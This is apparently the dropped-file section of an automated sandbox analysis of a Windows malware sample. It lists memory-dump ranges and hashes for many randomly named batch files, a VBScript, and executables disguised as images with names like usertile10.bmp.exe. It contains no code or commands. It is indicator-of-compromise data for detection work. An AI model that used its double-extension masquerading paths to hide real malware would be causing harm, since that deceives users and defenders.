memory/2848-37-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2512-34-0x0000000000340000-0x0000000000374000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

MD5 672a1f1de82c3076688c129d2c89d0e2
SHA1 02e8f06ad6888c9fb28059f5eac065b7bbfdd365
SHA256 1d8a8607dd5b6aa413649cd3dc7187497e6a7fcb616e56c980fcfb682ee8c363
SHA512 e2a10f2636cad8f3fe790d68454b929831a0d0b23b1a8714188ac23df2d4af4ff134650050cc1bc9ce870d5200c7b5da41b18fc1a300a86556049879af78fb90

C:\Users\Admin\AppData\Local\Temp\PWcwIUwM.bat

MD5 77c23aef55c221bd4955a4d912d5cdcc
SHA1 1d9cacab24cb365101d692e0e90b129654d1c088
SHA256 78bc7f485cadaeadb01be3d1f28bbfd31e7d46adb57ccecbd4e8f5a2dff7eefe
SHA512 70bc9505e042256ddcb5d6e62cca59a3d58679cf65511fbe27f6d2a655644b3796cbb6a4fdd596c7535f3be3466a46b45301fac546dae576b93604a30175c7d6

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/2612-59-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2808-58-0x0000000000180000-0x00000000001B4000-memory.dmp

memory/2808-57-0x0000000000180000-0x00000000001B4000-memory.dmp

memory/2848-68-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sgYkcsIM.bat

MD5 70b31e10e0fd5fa2beed8525b3ef2c16
SHA1 7420ea8b42da8ee11eb5800e437a75198f10e72b
SHA256 897f43ce106af5387ea1a126ef1667dc25f3330d2c817944014cb5cb9e29c56f
SHA512 83b5314e14aa4cf98e9ef6d84df8fc731b27775af39a356c90f08ec3529225f95325190a46b6ed43165dbc16eaf9fed86c3ca974d8ce8dc907f66030c5929071

memory/1116-84-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2344-83-0x00000000001E0000-0x0000000000214000-memory.dmp

memory/2344-82-0x00000000001E0000-0x0000000000214000-memory.dmp

memory/2612-93-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AOIMosUI.bat

MD5 d6e51eb9fee70afcc7640e378c02b75f
SHA1 ee181fcae57481679621c65f32e1fb565823453d
SHA256 e8bb7667f0bff9b825731ed890a227140202ab8903b89aae31e39102166a4688
SHA512 cedf7f6c5058a04b68a3cd3c6925956a3bc71d511dd41685c5d639b299da36c53352786c02af0e352309acac080695a88b2a864190ffed781b7983cc893c3a3c

memory/2444-107-0x0000000000400000-0x0000000000434000-memory.dmp

memory/988-106-0x0000000000330000-0x0000000000364000-memory.dmp

memory/1116-116-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GgwMowQU.bat

MD5 22e61f842b34789314cd4e7e4a029509
SHA1 3037045bfc31f969bebdc3fcd94fe7520dd482d9
SHA256 9bc5c582c20dadcac0661a03669d660d4823497e4f9ca1d0b329104b991fe557
SHA512 3662750f52b74f550b57a868a19bcd0048cb434741a23d8836764490ec8f341351f333b9ff035e1cd68b4db5b619d453e7a1b19c8cdb24d2e38ba674d6ed5343

memory/1636-129-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1696-130-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2444-139-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RIogIksA.bat

MD5 e4b1c827ad10920cce00696c59cf29e6
SHA1 26b055a6f5f743544d2418214437b0382bb93600
SHA256 5a2c50b1582dda958a867daecd0a3cca672327ea40e87df9d2a764f6c2b871d8
SHA512 c0e67a301d00efba2e6d71d63c153e855aba3cd0732f2e6d4321c372c8dd57d99dfa61e5b8a4eb2498ee3e9f279e52dd92ed845bba8517d521bbe06d11cdea81

memory/3056-153-0x0000000000120000-0x0000000000154000-memory.dmp

memory/2400-154-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1696-163-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wCQMEUMQ.bat

MD5 2eef5a5b498f50fb1960f0f94a28fda8
SHA1 82e33b9635505f44688abd54e3c05659076794f5
SHA256 7575a4615977bdc39ce49f12675f62da5eae9423c8cb8f063da17c6812f03a1d
SHA512 730c7c7c43ac3e488208f62891eae2727728cec8f78c99e92d6074bf09784dea88e0e87686fa1aa2f6319a4197e85be70f73afa8050d9a5285d72b9dfaaec0e6

memory/2764-177-0x0000000000120000-0x0000000000154000-memory.dmp

memory/2772-179-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2764-178-0x0000000000120000-0x0000000000154000-memory.dmp

memory/2400-188-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hoEgsAUk.bat

MD5 8c6e8a803c294e5cae9f11b9e788600c
SHA1 3545a5f40886c288006212b5850ee4bce6f3b8b9
SHA256 27da4f45b656348777d3ab53e7f3c3fae0dd2399de1ba65fb8b7a6a3b2ed2793
SHA512 9a7774a914cd3a15789135e47a162223cfcc9e3ba83e3c8cf89d1c20c4dda9496efb560c9eab562ff2e3295145d4c3de593a68afb3c35bf19d2a84bc878c35ef

memory/1728-201-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3044-202-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2772-211-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XUgkoMYg.bat

MD5 227cfbd8f13fb6ed308513ede8d6ce6e
SHA1 381c6b34d117b43864d63dc9d38ffb773c7d1e8a
SHA256 5525eda94d471eae73440f170516ca162eaafe793dfb4f8b7fa5ef5acbdac012
SHA512 b139654d12302a38f06fad6b020bef63f47123f4ccaefdba430a770bc8dd7ac15a07ced3052235ade862482fbdd804152491f608a0824603787f0e9dc9d54092

memory/1668-225-0x0000000000260000-0x0000000000294000-memory.dmp

memory/3044-233-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dYEUEcUg.bat

MD5 69b0849a7ae5bae1068ab0a19c77cfc2
SHA1 458f0ecbca344de0fc9488917f5e8652eba2ece8
SHA256 8378fd42766dec35de750f4601a747066bc26b2d79debfc4f62435d654bd3b46
SHA512 788db57f2985c114cb3090389df18571d1509fd92a43e41c9bf2d38e4f9bdaa6bc73e40bccb76be023bcf10d49b2f9a13ae621cb622bab1ffe1db037b15f5741

memory/1416-249-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1560-248-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1560-247-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3000-258-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ZqsIEoUw.bat

MD5 6538e21889d16095713e8bbd64896813
SHA1 6940996b050cceaa63f88d01290380bbdf496656
SHA256 593309cfdf67d2e2f239b3dbcecaa1b8b70700734f8f0dca68c2b8d900b426be
SHA512 4778c2096611b6372c6ec324e21983f35233be55d4cb0cf0379512ee6d8e69596428efd4d16cf3356f8799fab35dff9f186ca35f31b5f717eebf87d0eeb2afed

memory/2308-273-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1228-272-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1416-282-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SgUQsoIY.bat

MD5 0d18e3b30a23a9d492ae73d4e918625d
SHA1 395faada8aa6ff5f32c622bddaadee824c52e312
SHA256 33882f4e27575e851597e388aef0371d71d0563339cb4bf8e51a5c8b8573f203
SHA512 eca8f608a11078555a5d610003bbc7b4274b4d9b8533dff047b484765859eff06c20a9ef89f57bdc6c7831a395499e730621bb6065eb2e2f4516c2e068d208af

memory/536-295-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2084-296-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2308-305-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\muwIswMw.bat

MD5 184354e8775dec3362b31b489811f1d9
SHA1 5c1c14db895de4db1c42741f0d75483e6abe5dee
SHA256 b7e9cda6b737cd5c17c964711f4667ff89e31dc59a2b15ea3ebc3428d8d2d913
SHA512 fb25d327b356b1ccfa8096d565dcae58bf8f4d765be5338fb37da46760ac59e9a0e3f08f9c5fea6bc505af79d41fa6519edd930c20a1ef6e4b3a62c9e758d375

memory/2084-328-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2080-320-0x0000000000120000-0x0000000000154000-memory.dmp

memory/2080-319-0x0000000000120000-0x0000000000154000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cOwgwkYI.bat

MD5 be6ba1bca8a593e7fa471f1bdf26d25f
SHA1 349c5a80a5e769bdcbd3f1f9e411d6110f58b0ae
SHA256 93784094a4e4f18348fd94584de44ad2ddd0ae00040b739bcdf8453feba5e942
SHA512 84c481051f53c2596ea337ffdb606d3d4b1e1c09378b63efd470e1b698e6c9abbeb24f1fa7c9bf580f267371ba4afb911d979cace48a35ced717b6a750c0aeaf

memory/2596-342-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2172-351-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TEgcEkwk.bat

MD5 5e888628cfb3826c48046f0571c2876f
SHA1 a4533277d5338d7541251f56e31341dfd7396de0
SHA256 ddd3d21741558450de702cdf8d6df1296f47ac2c423e5f550aee27ae2d16c0ad
SHA512 143a279ed85ea7a766d4dfb4a199cedd2ec08bced0b241b28fd53bfe0dcf166a0bbc78acda364828b995b0e1cb23034a528405dc1a6a89de6c6af76da15b5674

memory/1556-365-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2596-374-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wuAwUQwo.bat

MD5 3842c79dc7fee96391146a86c8c51d4e
SHA1 7abeecf4cfa52306ee01493f920f7c4d30e88ab6
SHA256 4301fb2d4ca8ba8133f200e5cd0c7d4e8d918fccdf98e1dc28e78d0f7f2e315e
SHA512 dba0604d667dac083d2596ed8886df923de1b71f16b70482c3939fe1f6f8a5c08f89817b9d7b1af6392fa7aea0c991e35d7c56fef0c1b7af0f3ae36a9949814c

memory/2236-395-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ymQoAoEQ.bat

MD5 017ea670d7c57ea55c9af2171db6063d
SHA1 25542de3f4199aa43b9aec6f3fd52c6b8fd8b479
SHA256 459b24aa76cc8958a0fa432d7fbc60e64097e06627cf9519575a78882d34ccf5
SHA512 3bafecb39615a62ce636578493e0fa2c26ae40f4120d541c6acb694678d6c73469de2f5b93a89ab7364171dd357558d4191f7b3cca20a9121b8d2f4832005625

memory/1576-410-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2960-409-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2960-408-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2868-419-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vGoMwUEU.bat

MD5 c61db3aa9d367f765e6f0d44fe7898e7
SHA1 f4bf55f02de4a41a18f4e0868dc2ef3702feede2
SHA256 2c2da81fd678edf0ea1875767a4d679ddc7bc2cf5fe885a126c9ce040fe91835
SHA512 7c07e0e28bb80b96d44e2778e0e9b53f0f374b0b5052656858a2f0222ab8a93af76a2f1cd9b776aa7572c20e745965649181643f8cb35df591d929bee133cd37

memory/2724-435-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2788-434-0x0000000000200000-0x0000000000234000-memory.dmp

memory/2788-433-0x0000000000200000-0x0000000000234000-memory.dmp

memory/1576-444-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eQwgEAoQ.bat

MD5 8c832958f22201acad83e9d52e22659a
SHA1 9ec36de5dcd4e0462bc7bcbf75231d2f252c1771
SHA256 ed8a73e20de63db02d2244998f03854a515d7e9b57b647bc82984d116b19596f
SHA512 659a80a3353081c416e93a661d49c9e5bde4d16447a90e00f317f4844f30d72169ad50c086176f226c980e7499d25bb0543fe09a6a270b40ba3a31728a67ec43

memory/2760-458-0x0000000000180000-0x00000000001B4000-memory.dmp

memory/2724-467-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aaowIAsc.bat

MD5 6a268e5db34900535a6d5aede76645db
SHA1 f925be15f7177d0a1b056aaa99f55a71a98dcbf0
SHA256 1c13c14644ec68b3a2b83f36eeadbe56aabeb0cf6b36ab34ef613881b76ba6f9
SHA512 1f40703933f74ba696a3621e2cbdbba03aad1664cec58e56b5ae0aa642005f95e2357e8adc88e5af3263855e96015c8a95228307662cd43af509b730ee8df913

memory/3004-480-0x0000000002290000-0x00000000022C4000-memory.dmp

memory/3004-481-0x0000000002290000-0x00000000022C4000-memory.dmp

memory/2584-482-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2396-491-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qWAMQkEQ.bat

MD5 4003001cd2fe0ee4fb10e0cb4319c3c5
SHA1 65a4324fc29065638b03845024780c8ce64d1e41
SHA256 691cc726e9a5d2afb6cb51aab1d03e14679a34622627902a1671fb878eb88a52
SHA512 e623b826622a1602aa2e77df663b44566466494bf9dc6100aed80ac76b0414561653dc14a17b89d3a6d6635ba0795101ae2a537c8b842a04650cc25d89260bc6

memory/2584-510-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UsYU.exe

MD5 636615fb170ecf79f6af9e3beb653898
SHA1 893fbecf0907ce8ecf8dd6629f9c37dca0e93862
SHA256 2c562e749d9a0d6423db6dec3f0dc586b77778c26687c39d63f29c7100e81349
SHA512 9538321a0598bc90c7946511cceb99fb2bf6eb71e325bf7bc7605bad7de6585302d2b33147b7e598b7eee2cc2fc789b72167e35c21042ed0c31a364ab858c385

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.exe

MD5 2b7b3c2178d3c4762596c71239d9375d
SHA1 b64f44e9a20f08111093ee856cf27355f272a778
SHA256 a82c8305cbc76353352dca86076e56493b273a1ba2d30e894c2e906711a0dab3
SHA512 b6a17779620f169ec5cb2a909524892990f8224fe8d17dff3190a5ce0eb12a6e050a05d72d2d25be426689279289cae045963374e699c85cd00ddd84a9f47158

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.exe

MD5 646f725523c62f3e441e061e945ee902
SHA1 686aa794090180876a7cb8237c58b06da7b3f0aa
SHA256 65a5fa6d0eeaae98d2a83e96e8f08495074cdc6934825c3021bb8317577c41aa
SHA512 cf58172226a3b4992e254e6c4d8c81d85a08947c070fde3e6ceeb17930910bdc4a29168080d32d43c6ae41789e1c1cc43acbcd36e3b11ffe58ced11bd90fffc5

C:\Users\Admin\AppData\Local\Temp\jUMw.ico

MD5 47a169535b738bd50344df196735e258
SHA1 23b4c8041b83f0374554191d543fdce6890f4723
SHA256 ad3e74be9334aa840107622f2cb1020a805f00143d9fef41bc6fa21ac8602eaf
SHA512 ca3038a82fda005a44ca22469801925ea1b75ef7229017844960c94f9169195f0db640e4d2c382e3d1c14a1cea9b6cc594ff09bd8da14fc30303a0e8588b52a7

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.exe

MD5 b053d07a4426c19d2ca86621df55a5ac
SHA1 70017860e94dc1ac1e7cd037a6fc84329fffe851
SHA256 f5fb57877b66b9a94572478eb433eb41d7468a90b6c3641ea65a10c3a2b567a4
SHA512 0e3f087a8253a043620ada43de4a8f6945f327b65119ce51843576515fc055ef7517e38a60aa411e1bc8a8e94fc959825d9b8766a3345abb0cc1a4aa55cdb324

C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.exe

MD5 119ec475240ffc934568ae166a4317fd
SHA1 31198d9cf14c7a4f5e60dcfce8d6f5a1d478a6eb
SHA256 f6634a8af95df4f60c4d52b3ae4aa6ed49bc67f6e0dba0f24fb58e2b5179c8c6
SHA512 33360837e2ba6645207f3c3ff850da0fbe6137e65b913716dc76e6d1e98074f9327f8a318b2f97e39a6c971269b955b09362957eb524ebe3df87d4d6cda37ed5

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.exe

MD5 c198d84839186290f763af60a7ed444e
SHA1 e17c471b79fe818d012a3a6e70681396b713472b
SHA256 e526de7daa3be4a6eff648b11c5016510a4c8633e7494f259bdf860e24107d53
SHA512 d17e83951ec45965b657161a1f825389adf76954bb66dbc076e8d7c87b32e64501f3041e40db5466cce1b28c6e2a7d78d5faeafe64b2d7a0e857dd0454d5031b

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.exe

MD5 a548f66f697a25a6b5e206a079894002
SHA1 a99c8a3d3e62fbfe0315810f748e318f72c5ed29
SHA256 51cf9907b5aa647ace61decb803498987d58eefe7d4ace276ccab95ffdc10514
SHA512 07315acc62a43b180d336a02b6a1beced3775c1e4f28018dd32ed251fdd547d4623ce3885e6ccd771918b2b8d4584191ac4ce6bf45a05f6eb5a13d9cfff2e85e

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.exe

MD5 d44c6edaea1978a146b1765463254f03
SHA1 14b6a3d1f52a8145fd7858ece3af4f756f47be83
SHA256 0a785042454d74fb906ffd43db411775f0a11b5a6528a300b5d053f9a0247e6e
SHA512 4ae89636338c820f9d07f4c21b8241fb392578e21e7fe635cbd47249128ecd779e5df15cfd3c78da8107f2d5564efe36f864f1e22f6e1c07e830779653312e52

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.exe

MD5 637ba0b149c0ba2b35fe1170e97379fa
SHA1 8c0406e040c1bd8a24f56dd0fc01605a77773062
SHA256 a9e6ceba697566a84fab2e7a9dc438bdadfc43d27040b9f368422f44e6eb1987
SHA512 4845b85adecdacc3ff24193417721aed2df97bd5a9e25472e672e0d354e6e25abbbaabea9f57aa324e2a5a543dedbbc7d4d3a378f0bc387863aabf4d925f8beb

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.exe

MD5 abfca46b3351f178063bf17d3bc49641
SHA1 9b886ac4f53545f573288e05c7866dd8367b04b5
SHA256 6de8a457e1162614e188b3c08caf8adaef93ae5c6df04ab5a2d8cacfe7202d06
SHA512 acddc462ffee5904a2bedda40405ea165098aea19b156f484259e801dce657d9fc7157e17890e7228d56e4f4cc08fca0ee8ee4d8d84afcdfc99edbba38436307

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.exe

MD5 582bdacccbc3203ba6021babf1d3d3b4
SHA1 48035823cb912b45974303b81a1e974751750be2
SHA256 681913c2f227ce1ec5bf027d8d483bb69c939ccf1031f4269884ddf271072d40
SHA512 5cbad416f6dbd0a25db6030711a638c9d40d86182bab10a50043318ced6242a0136dc516bd8696bf1dd301dc7d0f7e0846fbbb1104775bcd6771484c9cc4d980

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.exe

MD5 2f2587e1c5b184d2e522b081e3fc70b4
SHA1 222cdef5d73fd97abcc1aa6de3f8891f5765ea96
SHA256 e8aff9e239402945232f1a3454cbb248970bba6b3dfc822f4769b26921f4796c
SHA512 dbfd65f8dfc776f9a2f6f640868f2eb0cca46c815f16187c575b3974a938eeb84ce41b4117ffaba1332a320251fe55436fe9e0adb9661ba0e126adc1ed7734f8

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.exe

MD5 269789a1172f4d11c34c000e925132da
SHA1 f8188d445234a0e0e2812ee48d69fc980ce2cfcd
SHA256 dcc623229dac44689559ee05c61e7114b0809c108ad8ab360323c8e5f4755eb4
SHA512 4a271c1ca2f109edb3f10e4f60a9432d4d3107acf98874cb798adc79f72e1317f53cc075dfeed441572ee44034ef814f1b8f437b11ea9460edab27f6621b9bb8

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.exe

MD5 44dd73dac53d31d19c43de7809caff74
SHA1 1dd94fec69fe3991a8ac21c13829172166231b4d
SHA256 b046e746e5aa38944489e4335aaf149bbd5a0700e6fa065c4b33d8fdd4510247
SHA512 babce6106f105b5747b64174cdfcde780e63468f31bc0a20ebf66ddd84991a8ac09f98a82e3714f3884b46acf6c64ce59cd2106865677a0d165700bc26697610

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.exe

MD5 67eb9f3a9c85e39061e3a352f34c1b15
SHA1 739d21aa4ad970117219297a9f12449a510586ee
SHA256 bfa45e2f08e30de71613388c815baec11305095bf3f3b1bed4fbb6708c975cbe
SHA512 2e324f632db1fd9de9597a67d8b5a3a75f4a9b8535612edad02c68bd78ad7b1fc0f72b5c2638c05261673ac5872cad65abec2430937da1aa4d49d053a0b6b2bb

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.exe

MD5 6db6b264606aa3b0cbaa045d2a6af2e2
SHA1 d521d58346f9f969ac822f09b5aeb5073c207916
SHA256 2dbfaac0895e4fb8c4c243c95e4f101c96a03221d0b1b5aa7f4cdc4603659f21
SHA512 eff2c2ac09e14d1906aac2209b3e3e03b55dae4ac439ed7b68161cb79f09f02878842d076e175590764aa100ef004a27c3f6955646b45b2012502aec395a84cd

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.exe

MD5 ade9695a1f646a2909f54943988984fa
SHA1 cf2bb34670204d9d6135c35032da1def5fa8f0d3
SHA256 f4bbdcd51a1f252d8a228b15c233df0dc6e7d16a197e24999882bb13e3452df1
SHA512 24cb0d1c5a4eed80ac6432407fb49f886b48bbeef5824534421bf28da533b507b8a072ba43ff13eae8d7fae080b07c4675ff355d4d04d6c5ed1771bf3f1e748c

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.exe

MD5 b6407ac7d03db63715370bd3581181f1
SHA1 b72150ea7c1fecb37049f25af4fb5bc9de05ed4f
SHA256 fc65a7633973b616bff979dc2329d936e9a371d769f688a09a8213730305acf3
SHA512 651bbbc2091a8bf67c77ef1b6691897eccbacecc87ec5291ccf380720da6c3017984a7bd1bc90d763779ddd220b2739fce72390814bffd34783767c48b7dc66c

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.exe

MD5 5bb3b6426515625fd8c7003a1998fcb2
SHA1 d33b85f1a3facf3082c94fd0d631778fbd3a93bb
SHA256 bceb10b4dcd60b534d0365fc1f26f8cc2b0e427acb4953977a685200f7f0312b
SHA512 925baba5d151e2b979821986b0d3572b31ec5851e5b1bc3a2f7c20462df1498a60014ae076fab336f717a7f5b7a370180d414b941ca438c1158a01636e32ec16

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.exe

MD5 a9957207e75ada24637dcd244801e2d6
SHA1 3cbd06333d3b09bce89c1022dee9a17ae03bf3d1
SHA256 35683ce511c733e9422e499c89d4d1732b7a1e9bd0641b11b5dda1259cbde035
SHA512 f04d6539e154f20d5c95b58a05172c47525d579023f19d58a019d342101f0935fa166794f6aa41362a79512d6090ebd60635e24b870138c3b8e871219b4ba05b

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.exe

MD5 17dc5c119b11c217eb6c6d45678a60af
SHA1 468e01e78326a3b0239df08b6f96f71da595c54e
SHA256 b44d233220271440791744a537dc0b512a129d32b70f33c574719f33ee0de092
SHA512 3a53c2c863e1ba56194f290932ddda2c284caf8a955244c9b5bff070fc655754050a6c762bcfd4aa877419050cc00be802c1b401bb5e600fb46b193b7a9d916a

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.exe

MD5 d3d19eca5e28391aea0ab764426458fe
SHA1 c0be96e542c5aedb879220dafe8f1dd9fd833c69
SHA256 27a3c4e6557254a4bd020dfae73efd36880bf86fc0cc20ca174d018c3969656a
SHA512 2ee9e6e9539a3199ab64fcf955fdbddc3ffdbce6ec9fab93d3b0a718ac93e10a0860d9bad8c87d27288fc34510e6daa651e72519dd01009dd35267753af757c0

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.exe

MD5 aadd808dbbaf78a12356fbb36b08edf8
SHA1 9a24057685022db64b3f7aef41ff2a3fa2f1ec54
SHA256 d05f1bd870d4216d1c40f01fc3f1e20d7aa5ca0f15b1865c0c11e14fe271e998
SHA512 4ff594d72c8c9919b2908d9af2f840525950099ac91d7cc1e4b05a7988bf282bee354874a2b74551ea10abe0e903d5bd035c52eabcc0a5bf8d306320b88ef8cc

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.exe

MD5 212a6d058807a332b8469285f0138777
SHA1 417a32ded5d306c151e3b4c06ea6ebf5014a7bd8
SHA256 4dad79c133281ebfd9051f8424e3fdb3d327817baf7efba352fc14b9bcac7448
SHA512 c231b7b8d7e33298990288ab379968db7c362d073981297fe53473a1a24092cd5ec96396242d5beafd5a6a74951affe02d2f90f9c6aba40987f46d8175d196f6

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.exe

MD5 b5784b172a8f5eca2dbceb7e4c40c911
SHA1 4fac4e2dc8ffa1ac2b2ee11473cf4f79d79b80b5
SHA256 fa7e7ec2b38970901f455cf893ca9a6b439da74eccbb8b2514c392d8462a98bf
SHA512 1aed1701a2d0006d7670c8234d9332c5fe0f563d50290fbbb065c421a587a39e3c6ea0b91c4d0086500db12f7dacf950a61dc3df9f644a6f5d3f1830f3f1ec15

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.exe

MD5 37bc544260e9147d9421e9709b0e34ed
SHA1 d09b13cf82a81041446235759afdb3a1e6253244
SHA256 eff49347312cd76a94d415105ef0610f2ac6d7667fdf9cd0f0c6974778506296
SHA512 53ab037aa39dad0f01eb5ec6502458690581a68cb0d059f99b0de3a304212e1437575c28ae57d34f2e8230090e92d85080bfbff416640c3b58f46c0767395755

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.exe

MD5 fde8da0bc9859db684695d6fdf409883
SHA1 5fb09b47e214257251dfc4d167ddce10a9ffff1d
SHA256 b8d1382099a2a5e4ec7ffb037631cfa3cdbd096ef3964fddd8239c61fe815642
SHA512 9bb06f31a6216b9135667ebe12584878784ff836d52542f6957512121e5ab5214366e106bf09e8ec91cb4455b4c5748bf9310cfc05e353623995e820b9f7528a

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.exe

MD5 5df3b7eab19be25be07f0ad2c5bb1c3d
SHA1 3e1062786990b89fe01064f70b3c02179ea0633f
SHA256 f138720fcf74aae31cd488c69e23a9f52342820999bcd0c156141bd83440c01f
SHA512 10aacd6191bc020124410361db79c8e311e6db7c7f28c5b4073fe2035ab077d730321509b2f62bf3da22785d877248c5c2afd21bdfa57e2fd46671cafa7edf79

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.exe

MD5 8ab01861111327a256b264b4922f094a
SHA1 235290c54332ca4f1a7e041e9fb024aee3f996b8
SHA256 b9fd70e46b394aa2244f5cd6b94c0cbf3020bfda9ff8ea87656f3cf368d803cc
SHA512 9bf1c77b89f03a96b2c9beb9608ac84b547a17b101240650fb87bcb534bf924d3bf97a5f5bcd919b0dedc40578f67c7422265e9bb92c5e08811b8e62e4108b3c

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.exe

MD5 3429cb479900b10c79576f8dbdece12a
SHA1 b4e2bbb1312cac168e0e0aa807750a3f2b0a66af
SHA256 6a384b167fab6bf5b5147778c411ffe4236c718c5d0c4b76cd6bf08d23952fde
SHA512 f4801b4eaecbb99e5d2977ea62793d70a76be3256d761f72d300aa83a5051b22b0cd1f9a2020f489fe81258b3beee22df1f79dadfd50bdc35c2677ed6b226dff

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.exe

MD5 a52a25daaf2ee350f8620b139d785f74
SHA1 083cb2e86489acdbacaf186a470f57ed0f5ac24a
SHA256 bcfe285813c2624456c6d04ac773cc9f21ba28b8dcf89d31c99eb04083829d70
SHA512 4c7e0e7ceb430cac3c0dc15c5e3b0fc596b1d24bb5bc8c20c508790d673c9783de1e6d4ae39a2b868d602ec4c637e39c446e43af68ca81c4061f3cfce98057a9

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.exe

MD5 a0479c2bce50f99a79fc3028ec8aebfc
SHA1 d3d95b154c6711c3eb2bb52b66848471a4011781
SHA256 6cb36337c5038a18c62f4a38acfdd29e441a2685389307e96e0733af1b8caeee
SHA512 6778b1d5cd65ade55d7a78696a7e103ce90d419e54bc83495ea148de6fbc99a771ad31acedbb79099ff4d57f6c9f49b1a861f1914d85e1b3e0c4b214c1a012ad

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.exe

MD5 a71a7e929e1bb2bb9258022990114219
SHA1 7daf1264e93356b6bff44e023c1be5dc3723e8dc
